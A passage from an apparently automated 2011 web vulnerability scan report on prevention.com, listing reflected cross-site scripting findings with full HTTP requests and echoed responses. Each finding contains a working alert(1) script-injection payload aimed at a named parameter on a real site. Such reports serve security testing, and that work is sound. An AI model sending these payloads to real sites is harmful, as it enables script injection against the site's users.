Date: Thu, 10 Mar 2011 17:04:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=0000SnHqX0d1m7-Kh50cYwu8Lvp:145vrsjho; Path=/
Content-Length: 66124

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<head>
   <title>Prevention.com - 404 Page Not Foun
...[SNIP]...
<!-- hide from non-JavaScript browsers
       var ord=Math.random()*10000000000000000;
       var tile= 1;
       var num = ord + "?";
       
                           
                   var topic= "5a8a3</script><script>alert(1)</script>8c04b44dec1";
       
       
                           var sbtpc= "slideshows";
       

                           var cat= "";
       
       
       var    querystring = location.search.substring(1);
       var querystringArray = querystring.split("&");
       var s
...[SNIP]...

2.77. http://www.prevention.com/cda/categorypage.do [channel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/categorypage.do

Issue detail

The value of the channel request parameter is copied into an HTML comment. The payload d4987--><script>alert(1)</script>846ba86fdc2 was submitted in the channel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/categorypage.do?channel=news.voicesd4987--><script>alert(1)</script>846ba86fdc2&category=multimedia&topic=slideshows HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server
$WSEP:
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 10 Mar 2011 17:04:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 17:04:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=0000iUCmpjwqQ5TNypFA7u9eQEE:145vrsjai; Path=/
Content-Length: 65345

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<head>
   <title>Prevention.com - 404 Page Not Foun
...[SNIP]...
<!-- CK: -channel-newsvoicesd4987--><script>alert(1)</script>846ba86fdc2-header-refreshAdTag-false Generated at Thu Mar 10 12:04:37 EST 2011-->
...[SNIP]...

2.78. http://www.prevention.com/cda/categorypage.do [channel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/categorypage.do

Issue detail

The value of the channel request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17009"><script>alert(1)</script>ec616cf732c was submitted in the channel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/categorypage.do?channel=news.voices17009"><script>alert(1)</script>ec616cf732c&category=multimedia&topic=slideshows HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server
$WSEP:
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 10 Mar 2011 17:04:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 17:04:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=0000u-jMr-9WCiCHL5pCz7Ims5c:145vrsjho; Path=/
Content-Length: 65326

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<head>
   <title>Prevention.com - 404 Page Not Foun
...[SNIP]...
<A HREF="http://ad.doubleclick.net/jump/prevention/newsvoices17009"><script>alert(1)</script>ec616cf732c;topic=multimedia;sbtpc=slideshows;cat=;kw=;tile=1;slot=728x90.1;sz=728x90;dcopt=ist;ord=123456?" TARGET="_blank">
...[SNIP]...

2.79. http://www.prevention.com/cda/categorypage.do [channel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/categorypage.do

Issue detail

The value of the channel request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c3eff'><script>alert(1)</script>ead12cfdf23 was submitted in the channel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/categorypage.do?channel=news.voicesc3eff'><script>alert(1)</script>ead12cfdf23&category=multimedia&topic=slideshows HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server
$WSEP:
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 10 Mar 2011 17:04:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 17:04:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=0000OS3jp_w-U-JUC1e9v_v1NSR:145vrsjai; Path=/
Content-Length: 65326

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<head>
   <title>Prevention.com - 404 Page Not Foun
...[SNIP]...
<input type='hidden' name='channel' value='news.voicesc3eff'><script>alert(1)</script>ead12cfdf23' >
...[SNIP]...

2.80. http://www.prevention.com/cda/categorypage.do [channel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/categorypage.do

Issue detail

The value of the channel request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ba1e'%3balert(1)//78788485c98 was submitted in the channel parameter. This input was echoed as 8ba1e';alert(1)//78788485c98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/categorypage.do?channel=news.voices8ba1e'%3balert(1)//78788485c98&category=multimedia&topic=slideshows HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server
$WSEP:
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 10 Mar 2011 17:04:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 17:04:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=00003c0wv2W7dOTZ72nC-QVFVhn:145vrsjho; Path=/
Content-Length: 64827

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<head>
   <title>Prevention.com - 404 Page Not Foun
...[SNIP]...
<scri' + 'pt type="text/javascript" language="JavaScript" src="http://ad.doubleclick.net/adj/' + siteName + '/newsvoices8ba1e';alert(1)//78788485c98;' + rasegs + ';topic=' + topic + ';sbtpc=' + sbtpc + ';cat=' + cat + ';kw=;tile=' + tile++ + ';slot=728x90.1;sz=728x90;dcopt=ist;ord=' + ord + '?" type="text/javascript">
...[SNIP]...

2.81. http://www.prevention.com/cda/channelpage.do [channel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/channelpage.do

Issue detail

The value of the channel request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dda04'%3balert(1)//7f033c0665c was submitted in the channel parameter. This input was echoed as dda04';alert(1)//7f033c0665c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/channelpage.do?channel=dda04'%3balert(1)//7f033c0665c HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server
$WSEP:
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 10 Mar 2011 17:04:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 17:04:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=00004OEwLPeeKy3O7OwRnRRVX2D:145vrsjai; Path=/
Content-Length: 64565

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<head>
   <title>Prevention.com - 404 Page Not Foun
...[SNIP]...
<scri' + 'pt type="text/javascript" language="JavaScript" src="http://ad.doubleclick.net/adj/' + siteName + '/dda04';alert(1)//7f033c0665c;' + rasegs + ';topic=' + topic + ';sbtpc=' + sbtpc + ';cat=' + cat + ';kw=;tile=' + tile++ + ';slot=728x90.1;sz=728x90;dcopt=ist;ord=' + ord + '?" type="text/javascript">
...[SNIP]...

2.82. http://www.prevention.com/cda/channelpage.do [channel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/channelpage.do

Issue detail

The value of the channel request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 696b5"><script>alert(1)</script>0347072cfe was submitted in the channel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/channelpage.do?channel=696b5"><script>alert(1)</script>0347072cfe HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server
$WSEP:
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 10 Mar 2011 17:04:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 17:04:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=00009pX5xY_v7bPcTUcTjRVteHC:145vrsjai; Path=/
Content-Length: 64808

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<head>
   <title>Prevention.com - 404 Page Not Foun
...[SNIP]...
<A HREF="http://ad.doubleclick.net/jump/prevention/696b5"><script>alert(1)</script>0347072cfe;topic=;sbtpc=;cat=;kw=;tile=1;slot=728x90.1;sz=728x90;dcopt=ist;ord=123456?" TARGET="_blank">
...[SNIP]...

2.83. http://www.prevention.com/cda/channelpage.do [channel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/channelpage.do

Issue detail

The value of the channel request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9f64a'><script>alert(1)</script>d5f9ba885bc was submitted in the channel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/channelpage.do?channel=9f64a'><script>alert(1)</script>d5f9ba885bc HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server
$WSEP:
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 10 Mar 2011 17:04:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 17:04:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=000049alRyd0wlEKKdZo9LItXlP:145vrsjho; Path=/
Content-Length: 64827

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<head>
   <title>Prevention.com - 404 Page Not Foun
...[SNIP]...
<input type='hidden' name='channel' value='9f64a'><script>alert(1)</script>d5f9ba885bc' >
...[SNIP]...

2.84. http://www.prevention.com/cda/channelpage.do [channel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/channelpage.do

Issue detail

The value of the channel request parameter is copied into an HTML comment. The payload 4526d--><script>alert(1)</script>70532fedd4 was submitted in the channel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/channelpage.do?channel=4526d--><script>alert(1)</script>70532fedd4 HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server
$WSEP:
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 10 Mar 2011 17:04:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 17:04:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=0000xWcPEy6b4i3ZVMsP9noNAmj:145vrsjai; Path=/
Content-Length: 64827

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<head>
   <title>Prevention.com - 404 Page Not Foun
...[SNIP]...
<!-- CK: -channel-4526d--><script>alert(1)</script>70532fedd4-header-refreshAdTag-false Generated at Thu Mar 10 12:04:52 EST 2011-->
...[SNIP]...

2.85. http://www.prevention.com/cda/newslettersignup.do [source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/newslettersignup.do

Issue detail

The value of the source request parameter is copied into an HTML comment. The payload c4211--><script>alert(1)</script>d23ccfe71a8 was submitted in the source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/newslettersignup.do?source=PVN-Footer-MAINc4211--><script>alert(1)</script>d23ccfe71a8 HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 10 Mar 2011 17:04:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 17:04:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=0000PXjWsJfDXDY5jYQdUo7qcFe:145vrsjho; Path=/
Content-Length: 69588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<head>
   
   <t
...[SNIP]...
<!-- CK: home-relatedContent-newslettersignup-src-PVN-Footer-MAINc4211--><script>alert(1)</script>d23ccfe71a8 Generated at Thu Mar 10 12:04:51 EST 2011-->
...[SNIP]...

2.86. http://www.prevention.com/cda/newslettersignup.do [source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/newslettersignup.do

Issue detail

The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3854e"><script>alert(1)</script>0b8c471daec was submitted in the source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/newslettersignup.do?source=PVN-Footer-MAIN3854e"><script>alert(1)</script>0b8c471daec HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 10 Mar 2011 17:04:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 17:04:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=0000oI6o8qaOUdzyvOIEKZxQ4YI:145vrsjho; Path=/
Content-Length: 69580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<head>
   
   <t
...[SNIP]...
<input type="hidden" name="currentSource" value="PVN-Footer-MAIN3854e"><script>alert(1)</script>0b8c471daec"/>
...[SNIP]...

2.87. http://www.prevention.com/cda/toolfinder.do [channel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/toolfinder.do

Issue detail

The value of the channel request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c782"><script>alert(1)</script>21167d254ad was submitted in the channel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/toolfinder.do?tf_type=bmi_calculator&channel=health7c782"><script>alert(1)</script>21167d254ad HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1799
Date: Thu, 10 Mar 2011 17:04:56 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 66194


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<head>
   
...[SNIP]...
<A HREF="http://ad.doubleclick.net/jump/prevention/health7c782"><script>alert(1)</script>21167d254ad;topic=toolsfinders;sbtpc=bmicalculator;cat=;kw=;tile=1;slot=728x90.1;sz=728x90;dcopt=ist;ord=123456?" TARGET="_blank">
...[SNIP]...

2.88. http://www.prevention.com/cda/toolfinder.do [channel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/toolfinder.do

Issue detail

The value of the channel request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32b19'%3balert(1)//ce148ec1e37 was submitted in the channel parameter. This input was echoed as 32b19';alert(1)//ce148ec1e37 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/toolfinder.do?tf_type=bmi_calculator&channel=health32b19'%3balert(1)//ce148ec1e37 HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1800
Date: Thu, 10 Mar 2011 17:05:00 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 65883


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<head>
   
...[SNIP]...
<scri' + 'pt type="text/javascript" language="JavaScript" src="http://ad.doubleclick.net/adj/' + siteName + '/health32b19';alert(1)//ce148ec1e37;' + rasegs + ';topic=' + topic + ';sbtpc=' + sbtpc + ';cat=' + cat + ';kw=;tile=' + tile++ + ';slot=728x90.1;sz=728x90;dcopt=ist;ord=' + ord + '?" type="text/javascript">
...[SNIP]...

2.89. http://www.prevention.com/cda/toolfinder.do [channel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/toolfinder.do

Issue detail

The value of the channel request parameter is copied into an HTML comment. The payload f1f7c--><script>alert(1)</script>2181276a0fa was submitted in the channel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/toolfinder.do?tf_type=bmi_calculator&channel=healthf1f7c--><script>alert(1)</script>2181276a0fa HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1800
Date: Thu, 10 Mar 2011 17:05:03 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 66215


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<head>
   
...[SNIP]...
<!-- CK: -channel-healthf1f7c--><script>alert(1)</script>2181276a0fa-header-refreshAdTag-false Generated at Thu Mar 10 12:05:03 EST 2011-->
...[SNIP]...

2.90. http://www.prevention.com/cda/toolfinder.do [channel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/toolfinder.do

Issue detail

The value of the channel request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bc398'><script>alert(1)</script>3b6cfed1002 was submitted in the channel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/toolfinder.do?tf_type=bmi_calculator&channel=healthbc398'><script>alert(1)</script>3b6cfed1002 HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1799
Date: Thu, 10 Mar 2011 17:04:58 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 66194


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<head>
   
...[SNIP]...
<input type='hidden' id='category_core' value='Healthbc398'><script>alert(1)</script>3b6cfed1002-BMI Calculator Tool'>
...[SNIP]...

2.91. http://www.prevention.com/cda/toolfinder.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/toolfinder.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eba4c"><script>alert(1)</script>dcc32349675 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/toolfinder.do?eba4c"><script>alert(1)</script>dcc32349675=1 HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1800
Date: Thu, 10 Mar 2011 17:04:41 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 60445


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<head>
   
...[SNIP]...
<input type="hidden" name="link" value="http://www.prevention.com/cda/toolfinder.do?eba4c"><script>alert(1)</script>dcc32349675=1">
...[SNIP]...

2.92. http://www.prevention.com/cda/toolfinder.do [tf_type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/toolfinder.do

Issue detail

The value of the tf_type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffa48"><script>alert(1)</script>450cfb1292c was submitted in the tf_type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/toolfinder.do?tf_type=bmi_calculatorffa48"><script>alert(1)</script>450cfb1292c&channel=health HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1800
Date: Thu, 10 Mar 2011 17:04:47 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 68323


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<head>
   
...[SNIP]...
<A HREF="http://ad.doubleclick.net/jump/prevention/health;topic=toolsfinders;sbtpc=bmicalculatorffa48"><script>alert(1)</script>450cfb1292c;cat=;kw=;tile=1;slot=728x90.1;sz=728x90;dcopt=ist;ord=123456?" TARGET="_blank">
...[SNIP]...

2.93. http://www.prevention.com/cda/toolfinder.do [tf_type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/toolfinder.do

Issue detail

The value of the tf_type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9cb4</script><script>alert(1)</script>188bcef6d60 was submitted in the tf_type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/toolfinder.do?tf_type=bmi_calculatora9cb4</script><script>alert(1)</script>188bcef6d60&channel=health HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

